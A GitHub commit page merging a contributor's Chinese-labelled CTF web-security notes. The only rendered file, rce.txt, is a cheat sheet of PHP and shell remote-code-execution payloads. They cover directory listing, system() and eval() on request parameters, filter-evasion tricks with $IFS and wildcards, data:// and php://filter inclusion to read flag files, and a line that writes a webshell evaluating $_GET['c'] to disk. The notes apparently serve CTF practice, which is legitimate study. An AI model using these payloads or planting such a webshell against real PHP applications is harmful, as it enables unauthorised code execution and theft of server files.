Skip to content

Commit

Permalink
Merge pull request C0nstellati0n#4 from theganlove/main
Browse files Browse the repository at this point in the history
合并uert的笔记
  • Loading branch information
C0nstellati0n authored Sep 15, 2024
2 parents 8b6e29d + 8e70c2d commit 05941a8
Show file tree
Hide file tree
Showing 10 changed files with 4,687 additions and 0 deletions.
497 changes: 497 additions & 0 deletions uert的笔记/ctf-web笔记汇总/mysql注入.txt

Large diffs are not rendered by default.

782 changes: 782 additions & 0 deletions uert的笔记/ctf-web笔记汇总/new 8.txt

Large diffs are not rendered by default.

479 changes: 479 additions & 0 deletions uert的笔记/ctf-web笔记汇总/php反序列化.txt

Large diffs are not rendered by default.

706 changes: 706 additions & 0 deletions uert的笔记/ctf-web笔记汇总/php审计.txt

Large diffs are not rendered by default.

48 changes: 48 additions & 0 deletions uert的笔记/ctf-web笔记汇总/rce.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");} x
$d=opendir(".");while(false!==($f=readdir($d))){echo"$f\n";}
$d=dir(".");while(false!==($f=$d->read())){echo$f."\n";}
print_r(glob("*"));
print_r(glob("/*"));
scandir('.');
scandir(current(localeconv()));
scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))));
print_r(next(array_reverse(scandir(pos(localeconv())))));
print_r(array_rand(array_flip(scandir(pos(localeconv())))));
system(end(next(get_defined_vars())));
print_r(scandir(dirname('__FILE__')));
system("ls");
var_export(scandir('/'));
var_dump(glob('/*'));
system($_GET['a']);&a=cat flag.php;
echo `cat fl''ag.php`;
highlight_file(next(array_reverse(scandir("."))));
eval(end(current(get_defined_vars())));&a=system("cat flag.php");
passthru('cat /flag_is_her3');
a=g;cat$IFS$1fla$a.php
system("cat fl*g.php");
system("tac fl*g.php");
print_r(file('flag.php'));
var_dump(file('flag.php'));
exec(%27cat%20/flag_is_her3%27,$array);var_dump($array);
readfile("flag.php");
$a=fopen("flag.php","r");while (!feof($a)) {$line = fgets($a);echo $line;} x
$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;} x
$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetcsv($a);var_dump($line);} x
system("cp fl*g.php a.txt "); //访问/a.txt
data://text/plain,<?=system('tac%20f*');?> x
include$_GET[a]?>&a=data://text/plain,<?php system('ls /');?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/Pg== x
include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/bin/ca?${IFS}f??????? x
/???/????64%20????.??? x
/???/???/????2 ???????? x
$a=fopen("flag.php","r");while($b=fgets($a)){echo $b;} x
system('echo -e " <?php \n error_reporting(0); \n \$c= \$_GET[\'c\']; \n eval(\$c); " > a.php'); //访问/a.php?c=system("tac flag.php"); x
system("cat fl*g.php | grep -E 'fl.g' ");
include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
include('flag.php');echo $flag;
include('/flag.txt');var_export(get_defined_vars());
include('flag.php');var_dump(get_defined_vars());
include("/flag.txt");$ss=ob_get_contents();ob_end_clean();echo $ss;
include('/flag.txt');var_export(get_defined_vars());exit();
include('/flag.txt');var_export(get_defined_vars());die();
424 changes: 424 additions & 0 deletions uert的笔记/ctf-web笔记汇总/rce1.txt

Large diffs are not rendered by default.

Loading

0 comments on commit 05941a8

Please sign in to comment.